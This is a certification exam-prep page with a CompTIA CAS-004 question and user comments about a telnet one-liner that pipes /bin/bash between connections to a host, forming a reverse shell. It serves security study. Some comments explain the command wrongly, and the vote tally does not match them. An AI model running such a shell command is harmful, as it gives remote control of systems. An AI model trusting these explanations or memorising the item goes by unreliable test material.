exam questions

Exam CAS-004 All Questions

View all questions & answers for the CAS-004 exam

Exam CAS-004 topic 1 question 253 discussion

Actual exam question from CompTIA's CAS-004
Question #: 253
Topic #: 1
[All CAS-004 Questions]

A penetration tester inputs the following command:

telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344

This command will allow the penetration tester to establish a:

  • A. port mirror.
  • B. network pivot.
  • C. reverse shell.
  • D. proxy chain.
Show Suggested Answer Hide Answer
Suggested Answer: C 🗳️

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
deeden
5 hours, 51 minutes ago
Selected Answer: C
Has anyone actually tried on the VM Kali/Metasploitable2 whether this actually works? There might be something wrong with the syntax but there are no sensible answers.
upvoted 1 times
...
Bright07
1 week, 2 days ago
Ans B. What is a network pivot? A network pivot allows an attacker to use a compromised host to access or interact with other network resources that are otherwise inaccessible from the attacker's starting point (like from the outside network). This command suggests that the tester is trying to use the compromised machine at 192.168.99.254 as a middle point to connect to other internal resources via port 344. This would be a classic pivoting attack where the attacker leverages an internal machine to traverse the network, bypassing firewalls or other security controls.
upvoted 1 times
...
fb2fcb1
1 year, 5 months ago
Selected Answer: C
C. reverse shell. The command provided is attempting to establish a reverse shell connection. A reverse shell is a technique used in penetration testing where the attacker's machine connects back to a compromised target machine, allowing the attacker to gain remote access and control over the target. In this case, the command is using the telnet utility to establish two connections. The first connection (telnet 192.168.99.254 343) is intended to execute the /bin/bash command on the target machine, which could potentially provide a shell session on port 343. The output of this command is then piped (|) to another telnet connection (telnet 192.168.99.254 344), which may establish a reverse shell connection back to the penetration tester's machine on port 344. By executing this command, the penetration tester is attempting to create a reverse shell connection from the target machine to their machine, enabling remote access and control over the compromised system.
upvoted 2 times
...
javier051977
1 year, 8 months ago
Selected Answer: C
The command creates a connection to the remote host 192.168.99.254 on port 343, runs the command /bin/bash, and pipes the output to another connection to the same host on port 344. This creates a reverse shell connection from the remote host to the attacker's machine, allowing the attacker to execute commands on the remote host from their own system.
upvoted 4 times
...
Amin4799
1 year, 8 months ago
Selected Answer: C
Sorry. C reverse shell
upvoted 2 times
...
Geofab
1 year, 8 months ago
Selected Answer: C
telnet reverse shell https://www.oreilly.com/library/view/hands-on-red-team/9781788995238/d2e61289-a76a-4d8c-b157-3e6be62eb510.xhtml
upvoted 3 times
...
Amin4799
1 year, 8 months ago
Selected Answer: B
Exactly B
upvoted 2 times
Amin4799
1 year, 8 months ago
Sorry. C reverse shell
upvoted 4 times
...
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
Loading ...
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago